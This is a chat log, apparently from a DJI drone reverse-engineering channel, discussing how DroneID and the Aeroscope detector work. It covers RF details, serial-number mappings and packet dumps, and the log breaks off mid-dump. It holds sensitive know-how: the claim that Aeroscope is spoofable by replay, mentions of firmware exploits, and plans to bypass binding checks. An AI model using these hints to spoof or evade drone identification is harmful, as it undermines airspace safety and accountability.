[2021-04-20 17:01:07] bin4ry : @djibot.5150 i didn’t turn anything into a word game. you said you thought using assistant turns on adb on the drone. which isn’t the case. i honestly didn’t understand what you were after at all, also i told you that assitant uses restore points of windows and that the firmware downloading mechanism can be reversed. i don’t understand where you are going here, we do not hand out all years of work on a silver plate. ask proper questions and get proper answers. and what should i understand from a question like „i want to upload to DDD, is it a hidden assistant setting“. i told you i don’t understand the question. the. you asked if that enables adb mode, i told you it doesn’t. i really don’t get what you are blaming me for here?! what of that is a word game of me? i gave you an proper answer what you need to do to achieve firmware downloading, so where is the problem here? same now again, @mefisto tells you to spit and tell what you are trying to do, and you bail out ? you were the one telling that you don’t want to speak about it in public, big lol man.

[2021-04-21 19:42:05] fredmicrowave : I have been monitoring M2p comms, first with the remote off so I could watch the drone trying to handshake, then connected, so I could see control packets jumping all around, and Occusync, that I had previously limited to 10mhz bandwidth (9mhz actually), on one frequency. I could get data from packets, but my knowledge stops at the Rf part. If there is something interesting or useful to do, I can try...

[2021-04-21 20:13:39] atlantic : it is an OFDM signal, based on the LTE phy. there is no generic tool to demodule it, as far as i know.

[2021-04-21 20:21:27] fredmicrowave : I though each packet could contain at least some useful information, (like ID) but I have no idea really.Tnx.

[2021-04-21 21:39:49] nopexecutor : There are several layers in there. At the end it conveys several channels, for video data, duml packets, flight log. Drone ID frame has a different structure than the usual downlink, it also usually happens on different frequency

[2021-04-22 12:40:10] rachfly : It seems that the aeroscope is transmitted in some other frequency bands in the M2p and M1p. Do you know how it is implemented in Phantom 4 \ pro ? does the gps and drone ID come from the lightbridge transmission or there are other freq\bursts that contain the relevant aeroscope data?

[2021-04-22 13:55:59] nopexecutor : I know how it works in P4P v2, no idea how it works in P4P...

[2021-04-25 06:56:13] rachfly : how it works in p4pv2? i guess it's ocusync, so probably like the mp1?

[2021-04-25 10:20:10] nopexecutor : Yup, it's based on Ocusync there. Only slightly different compared to e.g. MA2 (one OFDM symbol less, but it doesn't make any real difference to the decoded content...)

[2021-04-25 11:12:15] rachfly : Thank you :slightly_smiling_face: Isn't it weird that there isn't any information about Lightbridge protocol and the implementation of the droneID ? do I miss something on the web or here? LB is out there for a long time by now.. one would think that the information about it will be public (\rev community) after so long

[2021-04-25 17:08:25] atlantic : Well, reverse engineering is a nice hobby. I my experience, people that have reversed it (for instance drone id) are willing to give some small hints to other people that are also trying to reverse it. But they do not give away a complete solution for everyone to use without putting any effort in it themselves. that is just not fun,

[2021-04-25 17:16:59] atlantic : Good starting point is reading the FCC documentation. Record the entire spectrum the document says. there will be a downlink signal, uplink signal and drone id signal. try to locate the drone id in the spectrum plot / waterfall. Lightbridge is based on Wimax. Be careful when you share your signal recordings with other people that your GPS location may be in the recording.

[2021-04-26 05:01:43] mingtao :

[2021-04-26 05:02:05] mingtao : Aeroscope inside-edition

[2021-04-26 05:10:41] tmbinc : \o/ Is this any off-the-shelf SBC board that I don't recognize? It looks very custom and hand-built.

[2021-04-26 06:12:06] atlantic : interesting. The magic is under the heatsinks i suppose. I wonder if it has the same chips like in the aircraft/controller or they have someting like a Analog Device AD9364.

[2021-04-26 06:25:24] atlantic : But if you remove the heatsinks, all chips are shielded from RF with a metal house, so you still will not see something.

[2021-04-26 08:54:12] rachfly : Thank you for the answer. so ofc for Ocusync it is clear, the separation for downlink vs uplink vs aeroscope is clear (definitely different freq bands). for LB is less clear, or I miss something? Thanks

[2021-04-26 17:13:00] atlantic : Does somebody have a clue what the "SyncLeas transmission" of Hubsan is based on?

[2021-04-26 17:25:55] atlantic : or is it just a fancy marketing name for 802.11a with a Atheros chip

[2021-04-26 19:21:10] atlantic : i do not have a lightbridge drone. if you send a recording of a lightbridge drone i can have a look if there is a similair mechnism.

[2021-04-27 00:20:40] fredmicrowave : Military drone controller ? :smile:

[2021-04-27 04:53:52] reza.qodsi1362 : @atlantic the best solution is fccid when you have such a question . it seems just an ordinary Wi-Fi- atheros chipset. : <https://fccid.io/2AN75-ZINO2-1RX/Internal-Photos/Internal-Photos-4653995.pdf>

[2021-04-27 07:30:53] atlantic : thanks @reza.qodsi1362. their Zino 1 is advertised with wifi, the zeno 2 with this SyncLeas. When you look at this fcc doc it seems just wifi indeed.

[2021-04-27 07:32:05] atlantic : It must be some mass produced chip, either wifi or lte, at their price point.

[2021-05-14 05:21:31] hazardc : They can see this stuff with a basic sdr setup you can probably put together for less than 100 bucks but the PD probably paid 100k for it

[2021-05-14 06:24:23] atlantic : What does a mobile Aeroscope cost? I tought something like $8000 or so.

[2021-05-14 13:30:16] dkovar : You can see the packets with a basic SDR setup but decoding them requires a bit more effort. An Aeroscope unit runs about $30K, depending on antennas, service agreements, and such. Mobile is less. I don't have a price sheet handy. Definitely far less than $100K.

[2021-05-18 06:08:52] reza.qodsi1362 : it seems spoofing aeroscope is very easy ! just replay drone downlink signal ! aeroscope will beep and the serial number will be appeared !! no defense mechanism has been made !

[2021-05-18 18:28:37] atlantic : there is no timestamp field or something like that in the drone id signal, so indeed an Aeroscope cannot tell the difference between live, replay, or spoofed.

[2021-05-18 18:46:33] dkovar : A stock AS may not be able to. Post flight analysis would likely reveal the spoofed traffic.

[2021-05-18 22:15:23] fredmicrowave : I think that the time and date on the AC is set according to the phone´s. So by setting the date and time you want on your phone, you could fake timestamps.

[2021-05-19 17:19:08] atlantic : there are no time stamps in the drone id signal

[2021-05-20 12:53:29] kb : Does anyone have a list of the mapping between the model number in the droneid packet to the model name?

[2021-05-20 13:45:06] mutantroar : That would be nice. The first couple characters of the serial number are a good start. Here is what I've got so far for that: 08=Mavic Pro 07=P4 OA=Spark 0K=Air 16=Mavic 2 Pro 0M=Mavic2 Zoom 1S=Mini

[2021-05-20 13:45:49] nopexecutor : Nice to see more people able to decode it :) I've seen model 0x3A in MA2, 0x3F in MM2, 0x10 in Mavic Pro (or 2? Not sure), 0x24 in P4Pv2

[2021-05-20 13:48:26] nopexecutor : BTW. I've found recently some other signal with 640ms periodicity, embedded in main OcuSync2 DL (same freq, sharing bursts with normal traffic), which fails to decode for me using "usual method"... Anybody seen that?

[2021-05-20 14:08:15] bin4ry : that is what i use in dronehacks as a fallback to determine the drone from the sn prefix def device_from_snprefix(snprefix): if "08R" in snprefix: return "Mavic Pro" if "0B" in snprefix: return "Spark" if "0A" in snprefix: return "Spark" if "1SC" in snprefix: return "Mavic Mini CE" if "1SD" in snprefix: return "Mavic Mini FCC" if "3NZ" in snprefix: return "Mini 2" if "0M" in snprefix: return "Mavic 2 Series" if "16" in snprefix: return "Mavic 2 Series" if "29" in snprefix: return "Mavic 2 Enterprise Series" if "0K" in snprefix: return "Mavic Air" if "3N" in snprefix: return "Mavic Air 2" if "1W" in snprefix: return "Mavic Air 2" if "07" in snprefix: return "Phantom 4 Series" if "11" in snprefix: return "Phantom 4 Pro v2.0" if "09" in snprefix: return "Inspire 2" if "37Q" in snprefix: return "DJI FPV Racer"

[2021-05-20 14:08:19] bin4ry : maybe it helps

[2021-05-20 17:00:56] atlantic : you can also see the difference between Mavic Pro and the Platinum, it has a P instead of a 0 somewhere in the middle.

[2021-05-21 08:18:29] atlantic : 3Y Mavic Air 2S

[2021-06-03 22:35:57] nopexecutor : Uh, false alarm :P I found a way to decode those frames, just a small variation from the normal one, nothing interesting.

[2021-06-08 05:54:30] eitan1195 : in the lightbridge(phantom4pro for instance) - how is the aeroscope packets (containing the serial of the fc) passed?the fc module is ecnryted and can't be reversed.

[2021-06-09 06:27:52] tomer.cyber.punk : How did you get the FC module FW?

[2021-06-09 08:53:12] tomer.cyber.punk : Has someone knows the location of the code which is responsible to send droneid packets?

[2021-06-09 11:34:32] atlantic :

[2021-06-09 11:35:32] atlantic : This document gives some information on the drone id in the wi-fi based drones from DJI.

[2021-06-09 12:04:20] tomer.cyber.punk : @atlantic, I read this paper already but i'm not intrested in the WiFi communication but in the long range communication (WiMAX, LTE based?)

[2021-06-09 12:06:21] tomer.cyber.punk : In addition looks like in the WiFi based drones like the Mavic Pro the binary "dji_network" (which is implements the done id WIFI functionality ) is not executed at all

[2021-06-09 13:19:10] tomer.cyber.punk : @takeshi87 Do tou know at what freq DroneId packets are transmitted?

[2021-06-09 13:44:58] atlantic : There are at several frequencies, but not the same frequency as the downlink.

[2021-06-09 14:02:26] atlantic : When I put my Mavic Pro in wi-fi mode, it does not seem to transmit drone id. It does transmit something in the wi-fi Beacon frame, but it has no useful data.

[2021-06-10 06:47:31] tomer.cyber.punk : @atlantic Can you please tell the freqs? you can PM me

[2021-06-10 10:44:08] tomer.cyber.punk : @atlantic you are right, In wifi mode, no drone id is transmitter.

[2021-06-10 13:06:20] mutantroar : In wifi mode, the Mavic Pro sends the two packets that are supposed to contain the droneID data. It sends the identifying bytes for the packet, but the data itself is filled with x00.

[2021-06-10 15:21:11] atlantic : i have not disovered a system in the frequency, they are just "random" in the frequency band

[2021-06-10 15:27:47] atlantic : indeed

[2021-06-10 15:29:00] atlantic : I just record the entire band (in steps, my SDR can't record the entire band at once) nad look for it with a offline spectrum plot. I is hard to find a drone id in a live waterfall.

[2021-06-10 19:12:36] nopexecutor : From what I observed - it is typically centered on 2414.5MHz, 2429.5MHz, 2444.5MHz or 2459.5MHz, at least in OcuSync 2

[2021-06-13 12:00:30] saeedsasa941 : @takeshi87 Interesting, Thanks! and what modulation it uses? Is it possible to demodulate the Drone ID? as the Aeroscope does?

[2021-06-13 12:03:13] nopexecutor : On physical layer - OFDM + QPSK in channels, in general quite similar to LTE 10MHz. It is possible - but I haven't heard of any publicly available tool for that

[2021-06-13 12:11:40] saeedsasa941 : @takeshi87 Great thanks! Do you know if the packet is encrypted ? Or the drone ID packet is transmitter in plain text

[2021-06-13 12:24:01] nopexecutor : Not encrypted, but there is scrambling and error correction in place

[2021-06-14 15:13:11] cloudwerx : [https://youtu.be/4LSD9PTN6Zg](https://youtu.be/4LSD9PTN6Zg) sorry if this has already been posted

[2021-06-18 20:30:09] lapse98 : Thanks! Having issue identifying goggles vs FPV drone.

[2021-07-14 12:34:29] dkovar : I suck at RF. If I had an SDR available and I wanted simply to detect, not decode drone IDs: 1. What frequencies would I monitor? (2.4Ghz/5.8GHz) 2. What would I look for? Again, no need to decode it, I just want to know that there is a drone ID being broadcast.

[2021-07-14 13:46:55] nopexecutor : Which drone? Probably easiest to detect in OcuSync, where it often happens outside of the main signal BW, and is 10MHz wide compared to usual 20MHz normal DL. I typically saw it on 2.4GHz, but wouldn't bet on it...

[2021-07-14 14:18:22] dkovar : This is for a POC by a SDR engineer looking for an interesting project. So any current DJI model is good enough.

[2021-07-14 14:21:47] tmbinc : Just take the envelope and find packets with the right length then

[2021-07-14 14:22:05] tmbinc : To make this more interesting try to correlate with the reference symbol.

[2021-10-26 20:38:25] tmbinc_ : tmbinc_ joined the channel.

[2021-10-28 18:10:37] pixel : pixel joined the channel.

[2021-10-28 22:28:51] doctor : doctor joined the channel.

[2021-10-29 06:00:56] vortex : atlantic joined the channel.

[2021-10-29 07:22:22] zkar : zkar joined the channel.

[2021-10-29 16:58:06] dronedavid : dronedavid joined the channel.

[2021-10-30 04:06:17] crushedice2000 : crushedice2000 joined the channel.

[2021-10-30 08:04:20] antoine : antoine joined the channel.

[2021-10-30 12:16:13] jj : madmaqx joined the channel.

[2021-10-31 00:11:41] will : will joined the channel.

[2021-10-31 09:53:42] czokie : czokie joined the channel.

[2021-10-31 10:20:52] cs2000 : cs2000 joined the channel.

[2021-10-31 20:00:36] skyninja : skyninja joined the channel.

[2021-10-31 20:08:11] skyninja : does anybody know what chips are inside the Aeroscope to receive OcuSync and Lightbridge? I have seen photos, but they all have the metal RF shielding over the chips, so you can't see what chips they use. For wi-fi they probably use the Qualcomm Atheros chips. But what do they do for Ocusync and Lightbridge? The Mavic Pro has a Leadcore 1860 LTE soc. If I remember correctly they used some Analog Device RF transceiver + FPGA for early versions of Lightbridge, but switched to chinese ASIC for later versions. So is it a real software defined radio, say Xilinx FPGA in combination with Analog Devices RF tranceiver? Does somebody has the Aeroscope firmware? Does that give a clue, for instance does it contain FPGA images?

[2021-10-31 21:11:30] jcase : @skyninja more or less its got RCs in it

[2021-10-31 21:42:23] cs2000 : @cs2000 left the channel.

[2021-11-02 07:21:36] fly2high213 : fly2high213 joined the channel.

[2021-11-03 21:45:20] whydji : whydji joined the channel.

[2021-11-05 10:11:59] atlantic : Anyone already have RF recording / IQ samples of a DJI Mavic 3?

[2021-11-05 10:56:24] tmbinc : No, but it's P1 again, so I don't expect many changes

[2021-11-05 15:24:18] dave0x6d : dave0x6d joined the channel.

[2021-11-08 15:12:49] j4ck : j4ck joined the channel.

[2021-11-09 11:32:14] dkovar : I'm seeing Drone IDs of the form NewDrone_xx. Is this what is actually transmitted, or is this the AS unit not recognizing the drone type?

[2021-11-09 15:03:39] atlantic : do you have a screenshot of that?>

[2021-11-09 15:13:01] atlantic : The Drone ID is transmitted by the drone, and I assume an Aeroscope will display it as is, it is up to 16 characters.

[2021-11-09 15:53:50] nopexecutor : Hmm... at least the "drone type" in droneId packet was just 1 byte - I would assume AS has problems interpreting some new values

[2021-11-09 16:36:04] atlantic : btw I meant the "Drone ID" field and not the Drone ID packet (-:

[2021-11-09 19:10:04] the_lord : AS is not recognizing the drone type, whenever new drone released you'll see this

[2021-11-09 19:10:27] the_lord : most probably its M3

[2021-11-10 08:58:53] jezzab : If it's NewDrone_68 (pretty sure they use decimal otherwise it's NewDrone_44) it's a Mavic 3 @dkovar

[2021-11-10 08:58:53] jezzab : If it's NewDrone_68 (pretty sure they use decimal otherwise it's NewDrone_44) it's a Mavic 3

[2021-11-10 09:03:03] jezzab : The serial is up to 16 chars, the rest of the data is much more than that. The ID used by later versions is a single byte

[2021-11-10 09:03:03] jezzab : The serial is up to 16 chars, the rest of the data is much more than that. The model ID field used by later versions is a single byte as mentioned

[2021-11-10 09:03:03] jezzab : The serial is up to 16 chars, the rest of the data is much more than that. The model ID field used by later versions is a single byte

[2021-11-10 10:19:15] dkovar : I'll have _61, _68, _69, _70 all in the last few months.

[2021-11-10 10:20:03] dkovar : And "unknown"s show up over the years as well. And a bunch of "???????????"

[2021-11-10 10:25:18] the_lord : most probably AS did not getting the full SN or received corrupted packet , so it is showing unknown

[2021-11-10 10:32:00] jezzab : Its because the software if out of date. Those are ``` 61 FPV 68 M3 69 M2 Enterprise Advanced 70 Mavic Mini SE ```

[2021-11-10 10:32:00] jezzab : Its because the software if out of date. Those are ``` 61 FPV 68 M3 69 M3 Enterprise Advanced 70 Mavic Mini SE ```

[2021-11-10 10:32:00] jezzab : Its because the software is out of date (or maybe there isnt a newer version). Those are ``` 61 FPV 68 M3 69 M2 Enterprise Advanced 70 Mavic Mini SE ```

[2021-11-10 10:38:44] dkovar : Thank you very much.

[2021-11-10 16:49:46] aszeszo : aszeszo joined the channel.

[2021-11-11 15:07:39] skyninja : In the Aeroscope, I am seeing fakefake12345678 in the droneID field (the "serial number"). The number after fakefake varies. The observered dronetypes a mostly MavicPro, sometimes P4P, P4 or unknow (yes the n is missing). Any ideas where that fakefake is coming from? I assume there is some form of error detection like a CRC in a drone id packet, so it will not be a receive error. Also why do I not see it with other drone types. MavicPro, P4P, P4 are all OcuSync 1 drones, and the rest is OcuSync 2 and beyond? Does the number after fakefake mean anything?

[2021-11-11 15:08:54] atlantic : The drone id packets have a CRC24 at the end.

[2021-11-11 15:12:20] the_lord : fakefakeXXXXXXX means there is problem in the drone FW itself not the AeroScope you also notice the drone location is incorrect beyond the detection range of AeroScope itself

[2021-11-11 21:49:06] jcase : fakefake just means the privacy flags are set

[2021-11-11 22:05:16] tmbinc : The number after "fakefake" is a hash of the serial number, I think

[2021-11-11 22:06:07] tmbinc : and right, it depends on "user_priv" flag

[2021-11-11 22:06:19] tmbinc : if that's set, it uses this fakefake thing, otherwise the real serial

[2021-11-11 23:21:49] jcase : if i recall it used to be just a random number, but im not sure

[2021-11-11 23:21:54] jcase : its been years since ive looked

[2021-11-11 23:22:14] jcase : i could (And probably am) be wrong

[2021-11-12 10:31:50] cs2000 : cs2000 joined the channel.

[2021-11-12 10:31:59] cs2000 : @cs2000 left the channel.

[2021-11-12 10:32:05] cs2000 : cs2000 joined the channel.

[2021-11-12 10:32:34] cs2000 : @dji-rev-bot

[2021-11-12 10:32:42] cs2000 : @cs2000 left the channel.

[2021-11-12 10:33:12] cs2000 : cs2000 joined the channel.

[2021-11-12 10:33:18] cs2000 : dji-rev-bot added to the channel by cs2000.

[2021-11-12 10:33:22] cs2000 : @cs2000 left the channel.

[2021-11-12 13:24:35] the_lord : I saw many cases, drones with stock FW broadcasting fakefakeXXXXX due to bug in FW not setting privacy flag properly

[2021-11-14 20:36:27] jezzab : ^^ this. There is a buffer overflow in the older FC firmware where it sends a random number after the fakefake

[2021-11-15 05:44:52] dave0x6d : 0click remote infoleak? ?

[2021-11-16 14:51:16] alex1234 : alex1234 joined the channel.

[2021-11-21 18:42:18] dkovar : Looking at 6 months of AS data. 21,525 total flights 5,066 flights with no pilot location data 1,078 of those flights had more than 10 points in them. The drone types were all over the range. 96 of those flights had no home location. The drone types were P3, Mavic Mini, Mavic Mini 2, and Mavic 2. 1) Pilot location comes from mobile device, correct? And it gets that information from the onboard location service and the app sends it to the UAV? 2) What legitimate reasons are there for no location data to be available? 3) Would putting the mobile device in airplane mode produce this effect and would it otherwise limit the functionality of the drone? 4) How much of this might be illegitimate? 5) Where does the home location data come from? The UAV itself?

[2021-11-21 19:30:23] tmbinc : is "home location" different from "app location"?

[2021-11-21 19:30:47] tmbinc : For mini2 (and I assume the others in the same way), app sends app location, time etc. to UAV, then UAV puts it into the droneid packet

[2021-11-21 19:31:46] tmbinc : btw how much of those flights is a.) wifi, b.) lightbridge, c.) ocusync?

[2021-11-21 19:32:23] tmbinc : ah, is home location RTH location? I need to double check if that's included in the droneid packet (others maybe know?)

[2021-11-21 21:58:55] atlantic : home location is different then app location.

[2021-11-21 22:00:57] atlantic : has a DJI controller a Ublox GNSS chip inside, or does it get the app location from the phone that runs the app?

[2021-11-21 22:02:11] atlantic : 3. if i put my phone in airplane mode, i still have gps.

[2021-11-21 22:05:12] atlantic : 1. i assume that the app sends its gps location on the uplink and the uav sends this location together with other info on the drone id signal.

[2021-11-21 22:26:46] dkovar : Those flights are a mix of all of the options. Home location is RTH and is included in the packet. App location is Pilot location and that comes from the mobile device running the app.

[2021-11-22 07:28:52] atlantic : Do you have a mobile Aeroscope, or a Stationary Unit?

[2021-11-22 07:31:48] atlantic : "more than 10 points in them", you mean you received more than 10 packets with a location?

[2021-11-22 09:21:50] tmbinc : btw, the behavior of phones in airplane mode wrt. GPS has changed over the years, so I wouldn't rule out that there are still some that switch off GPS. (iOS only changed this in iOS 8 or so, for example). Also, GPS without correction data may take a loooong time to get sync so I would not be surprised if some people with airplane mode on will not have a valid app position.

[2021-11-22 09:21:50] tmbinc : btw, the behavior of phones in airplane mode wrt. GPS has changed over the years, so I wouldn't rule out that there are still some that switch off GPS. (iOS only changed this in iOS 8 or so, for example). Also, GPS without correction data may take a loooong time to get sync so I would not be surprised if people with airplane mode on will not have a valid app position.

[2021-11-22 10:27:13] cooker : cooker joined the channel.

[2021-11-22 11:46:47] kilrah : and a bunch of people use dedicated tablets without cellular (and thus GPS) for their drones

[2021-11-22 11:46:47] kilrah : and a bunch of people use dedicated tablets without cellular for their drones

[2021-11-23 00:07:14] dkovar : This is coming from a variety of sources. "More than ten points" - yes, more than ten individual records for the same UAV. There are a lot of "short tracks" - tracks with only a few points. A dedicated tablet without cellular seems to be the most likely source of the missing data.

[2021-11-23 16:57:36] atlantic : This uuid in the droneid packet [ref Anatomy-of-DJI-Drone-ID-Implementation1.pdf page 12], is there a way to relate that to a dji account? You have to make a account on dji.com to use their drones, I assume that will generate a uuid that is transmitted in the droneid packet. Is there a way (API on their website or something) to user info related to that uuid?

[2021-11-23 17:01:26] atlantic : Apparently if you fly with another app than a DJI app, the uuid is filled with something else.

[2021-11-23 17:24:47] jcase : yes it links to the account, but you need to work with dji to get the account information from that uuid

[2021-11-24 14:59:06] dnacho : pabloiarriola joined the channel.

[2021-11-24 23:05:42] kimberlyisaflake : kimberlyisaflake joined the channel.

[2021-11-28 00:18:42] tissy : tissy joined the channel.

[2021-11-28 23:30:37] tissy : Does anyone happen to know how the pitch, roll & yaw angle on a DroneID packet is encoded please.

[2021-11-30 07:04:47] czokie : Your best idea is to look at the dissectors on the og github https://github.com/o-gs/dji-firmware-tools

[2021-11-30 10:35:54] atlantic : @tissy see Anatomy-of-DJI-Drone-ID-Implementation1.pdf page 12. I have not verified it myself.

[2021-11-30 10:37:00] atlantic :

[2021-11-30 21:04:31] dkovar : OK. P4 UAV flew four flights in close proximity in time and space. Data is collected by a single sensor. On the first flight, the Drone Type appears as "P4", next flight "P4 Series", then "P4", then "P4 Series" again. Normally I'd think firmware on the sensor, but it was the same sensor.

[2021-12-04 22:57:38] aol : aol joined the channel.

[2021-12-07 15:26:50] enigma2 : enigma2 joined the channel.

[2021-12-08 08:29:06] galbb12 : galbb12 joined the channel.

[2021-12-09 14:32:56] staydji : staydji joined the channel.

[2021-12-10 08:21:21] il1oo0 : il1oo0 joined the channel.

[2021-12-14 15:33:53] msp3241 : msp3241 joined the channel.

[2021-12-14 16:27:22] feckless : feckless joined the channel.

[2021-12-20 18:06:30] alex1122 : alex1122 joined the channel.

[2022-01-02 18:52:57] djshadowxm81 : djshadowxm81 joined the channel.

[2022-01-03 17:51:35] droneuser : biosblob joined the channel.

[2022-01-08 21:57:38] lurker : lurker joined the channel.

[2022-01-13 13:11:10] lapse98 : Anyone know the ID numbers for a Mavic 3? Seeing a lot of “unknown” flights starting with 4AEC

[2022-01-13 13:11:10] lapse98 : Anyone know the ID numbers for a Mavic? Seeing a lot of “unknown” flights starting with 4AEC

[2022-01-13 14:48:47] atlantic : Mavic 3 seems to start with F45 and F4Q.

[2022-01-13 14:52:36] atlantic : and it has 16 characters in stead of the "normal" 14.

[2022-01-13 14:54:46] atlantic : I do not know what starts with 4AEC.

[2022-01-13 15:18:58] atlantic : According to an country's aircraft register, that includes drones, starting with 4G is Mavic 2 Enterprise Advanced.

[2022-01-13 15:43:43] lapse98 : Interesting. I’ll do some more research on those flights. Thank you

[2022-01-14 18:27:57] the_lord : @brbaron its mini SE

[2022-01-20 03:05:38] buckram : buckram joined the channel.

[2022-01-25 13:51:21] masskrug : masskrug joined the channel.

[2022-01-26 14:31:09] skyninja : Is it possible to connect a Aeroscope stationary unit to your own server (so no DJI cloud or no DJI on-prem server)? An Aeroscope needs a certificate to connect to a server. Can you install your own certificate, or will it check if the certificate is signed by some DJI authority? Anyone having experience connecting an Aeroscope to your own server?

[2022-01-26 14:39:16] the_lord : @skyninja please check PM

[2022-01-26 22:21:40] pingspike : damn… is the answer a secret?

[2022-01-27 13:08:15] the_lord : sorry @pingspike , its not a secret, yes it is possible to develop your own software to integrate Aeroscope to your own server without DJI's software

[2022-01-31 08:46:33] jackmax : jackson joined the channel.

[2022-02-01 15:33:53] skyninja : On a mobile Aeroscope, the build-in CrystalSky screen is connected to the Aeroscope using an USB cable. When we start up the mobile Aeroscope and start the Aeroscope application on the screen, the Link LED remains red and it is not working. We pull the USB cable and then re-insert it. The Link goes green and everything works fine. So we always do this on start up. Now we want to use the Aeroscope remotely via an remote desktop app, so we can't go to the site to pull the USB cable. Does others have this also?

[2022-02-01 18:16:36] the_lord : yes all aeroscope mobiles do the same

[2022-02-01 18:32:15] skyninja : I found a solution. If you reboot the CrystalSky via a terminal (I used SSHelper), after reboot, the problem is gone and the led is green.

[2022-02-01 18:38:26] the_lord : because the reboot connects the CS after the AS boot

[2022-02-07 15:22:40] markus83 : markus83 joined the channel.

[2022-02-09 18:17:08] bepeta8783 : bepeta8783 joined the channel.

[2022-02-10 23:49:49] heijningen007 : heijningen007 joined the channel.

[2022-02-17 23:38:11] mutantroar : Anybody know what drone models have the serial number that starts with 4DTS?

[2022-02-18 01:35:06] jackxorjack : jackxorjack joined the channel.

[2022-02-18 15:31:34] the_lord : its Mini SE

[2022-02-21 13:43:23] alex112233 : alex112233 joined the channel.

[2022-02-22 15:38:40] dkovar : I'm looking at AS data from several vendors. Sanity check - the DroneID is the serial number printed on the label of the drone detected by the AS? I have a vendor that says it is the FC's serial number but that doesn't match.

[2022-02-22 16:15:18] the_lord : your vendor is correct, the serial number you are seeing in AS data is the FC's SN old model drones (P3, P4, In1,...) FC SN doesn't match the label newer models MP, M2, ... label SN is FC SN

[2022-02-22 16:17:35] the_lord : also In1 and P3 droneID doesn't contain home or pilot location

[2022-02-22 16:21:50] dkovar : Thank you very much.

[2022-02-22 16:51:39] the_lord : just checked old data, some droneID packets of old models contain home location

[2022-02-22 17:14:54] markus83 : droneid

[2022-02-22 17:49:15] dkovar : I'm seeing the information evolve over time. And some AS integrators then do weird things with the. data.

[2022-02-22 19:20:44] atlantic : you can see the fc serial numberin the about tab of the DJI Go 4 app.

[2022-02-22 19:21:38] pingspike : are you saying newer models don’t? ?

[2022-02-22 19:27:00] the_lord : I'm talking about old models, some droneID packets of old models contain home location and some don't all new models I saw contain home location

[2022-02-23 15:00:49] pingspike : ahhhh right ??

[2022-02-23 15:01:02] pingspike : that makes more sense

[2022-02-27 15:45:45] tmbinc : @nopexecutor do you understand enough of the Ocusync protocol to understand what prevents, say, a WM150 from binding with a RCS231? As far as I know, DJI uses all-custom sets of firmware but that's probably mostly lazyness (and attempting to minimize test matrices) on their side. We have sufficient exploits to run arbitrary code on both S1 and P1 based chips so if we could "nop out" the checks during binding to allow arbitrary bindings (potentially with selecting the right CP firmware), that would be super-interesting.

[2022-02-27 16:05:54] nopexecutor : Hmm, as of now I don't know enough to say what blocks it, but it may be not that hard to at least start some investigation. I've seen neither RCS231 nor WM150 communication. WM150 = FPV air unit, RCS231 = mini2 / FPV RC?

[2022-02-27 16:07:55] nopexecutor : I've seen MA2, P4Pv2 full comms, from the moment of binding, can decode both. For Mavic 2 I've seen the middle of transmission, can decode those also (still, similarly as in previous - mostly DL side, apart of small exceptions)

[2022-02-27 16:08:54] nopexecutor : I have not samples of 40MHz BW transmission from FPV, so no idea if the decode of that comes easily or not

[2022-02-27 16:10:58] nopexecutor : If you have samples of natural binding process of RC231 and WM150 with their native counterparts I can try to decode it and extract PDUs/ control messages / DUML / whatever channels they have. Also looking at an attempt of this hybrid binding may give some clues

[2022-02-27 16:30:25] nopexecutor : hm, or is RCS231 == RC231 (MA2 RC)?

[2022-02-27 16:31:07] nopexecutor : (no access to my files now, laptop busy collecting russian mil comms :P )

[2022-02-28 15:31:57] tmbinc : Yeah RCS231 == RC231, i.e. an S1-based WM231 remote. (There were attempts to build a P1-based RC231 but that never happened/was never released)

[2022-02-28 15:32:48] tmbinc : I'll try to get a sample of RC231 pairing with something

[2022-02-28 15:37:56] nopexecutor : I've seen RC231 pairing with Mavic Air 2

[2022-02-28 15:39:02] nopexecutor : pairing & initial sync after both are turned on. I haven't seen any captures related to WM150

[2022-02-28 15:39:56] nopexecutor : typically the drone / air unit starts the transmission after it is turned on; the RC joins when it detects DL signal

[2022-02-28 15:53:57] tmbinc : Can you share the PDU of what the UAV side transmits initially? Does it have any of these IDs? ``` 0xE240 0xE331 0xE811 0xE607 0xB420 0xE500 0xE231 0x1803 0xE170 ```

[2022-02-28 15:56:43] tmbinc : They vaguely look like DJI devices - WM240 (mavic 2), WM331 (P4), ZV811 (old glasses), ??, PM420 (inspire), AG500 (agras), WM231 (MA-2), ??, FPV

[2022-02-28 17:39:11] nopexecutor : Quick check doesn't show those values... at least in init transmission, I'll need to recheck the pairing process. Hm, some example of initial DL communication of already paired rc231 <-> MA2:

[2022-02-28 17:39:14] nopexecutor : chId: 2 seqNbr: 130 size: 8 data: 080702017201007c chId: 2 seqNbr: 131 size: 8 data: 080702017201007c chId: 2 seqNbr: 132 size: 29 data: 111c02d13f3f000000000000003f0100010000003f3f0000000000002d chId: 2 seqNbr: 133 size: 29 data: 121c02d13f3f0000000000003f3f0000000000003f3f000000000000a6 chId: 2 seqNbr: 134 size: 29 data: 111c02603f3f00000000000001000100010000003f3f00000000000040 chId: 2 seqNbr: 135 size: 29 data: 111c02603f3f00000000000002010100010000003f3f0000000000004d chId: 2 seqNbr: 136 size: 25 data: 101802d137073505395132260100000037073505010000001f chId: 2 seqNbr: 137 size: 19 data: 0e1202000e0c0000000000020100504cff7fc2 chId: 2 seqNbr: 138 size: 29 data: 111c02d13f3f00000000000003020100010000003f3f00000000000037 chId: 2 seqNbr: 139 size: 29 data: 111c02603f3f00000000000004030100010000003f3f00000000000057 chId: 2 seqNbr: 140 size: 29 data: 111c02603f3f00000000000005040100010000003f3f00000000000070 chId: 2 seqNbr: 141 size: 14 data: 090d0201391200000002010000b6 chId: 2 seqNbr: 142 size: 19 data: 0e120a00060c0000000000020100504cff7fbf chId: 2 seqNbr: 143 size: 29 data: 111c02603f3f00000000000006050100010000003f3f0000000000007d chId: 2 seqNbr: 145 size: 29 data: 111c02603f3f00000000000007060100010000003f3f00000000000068 chId: 2 seqNbr: 146 size: 29 data: 121c02603f3f0000000000003f3f0000000000003f3f000000000000c9 chId: 2 seqNbr: 147 size: 29 data: 111c02603f3f00000000000008070100010000003f3f00000000000063 chId: 2 seqNbr: 148 size: 29 data: 111c02603f3f00000000000009080100010000003f3f00000000000020 chId: 2 seqNbr: 149 size: 29 data: 111c02003f3f0000000000000a090100010000003f3f000000000000fa chId: 2 seqNbr: 150 size: 29 data: 111c02003f3f0000000000000b0a0100010000003f3f000000000000ef chId: 2 seqNbr: 152 size: 29 data: 111c02603f3f0000000000000d0c0100010000003f3f00000000000010 chId: 2 seqNbr: 153 size: 29 data: 111c02003f3f0000000000000e0d0100010000003f3f000000000000ca chId: 2 seqNbr: 154 size: 29 data: 